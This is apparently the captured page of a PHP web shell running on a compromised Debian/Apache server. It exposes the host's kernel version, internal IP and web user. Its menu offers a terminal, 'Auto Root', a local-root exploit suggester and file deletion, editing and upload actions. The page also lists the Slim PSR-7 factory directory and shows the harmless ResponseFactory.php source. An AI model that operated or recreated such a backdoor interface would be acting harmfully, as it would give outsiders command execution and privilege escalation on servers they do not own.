Linux cesa-www-main 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
Apache/2.4.68 (Debian)
Server IP : 10.218.0.2 & Your IP : 216.73.216.28
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
php /
Slim /
Psr7 /
Factory /
Delete
Unzip
Name
Size
Permission
Date
Action
RequestFactory.php
1.61
KB
-rw-r--r--
2023-04-17 16:02
ResponseFactory.php
779
B
-rw-r--r--
2023-04-17 16:02
ServerRequestFactory.php
3.44
KB
-rw-r--r--
2023-04-17 16:02
StreamFactory.php
2.49
KB
-rw-r--r--
2023-04-17 16:02
UploadedFileFactory.php
1.14
KB
-rw-r--r--
2023-04-17 16:02
UriFactory.php
3.17
KB
-rw-r--r--
2023-04-17 16:02
Save
Rename
<?php /** * Slim Framework (https://slimframework.com) * * @license https://github.com/slimphp/Slim-Psr7/blob/master/LICENSE.md (MIT License) */ declare(strict_types=1); namespace Slim\Psr7\Factory; use Fig\Http\Message\StatusCodeInterface; use Psr\Http\Message\ResponseFactoryInterface; use Psr\Http\Message\ResponseInterface; use Slim\Psr7\Response; class ResponseFactory implements ResponseFactoryInterface { /** * {@inheritdoc} */ public function createResponse( int $code = StatusCodeInterface::STATUS_OK, string $reasonPhrase = '' ): ResponseInterface { $res = new Response($code); if ($reasonPhrase !== '') { $res = $res->withStatus($code, $reasonPhrase); } return $res; } }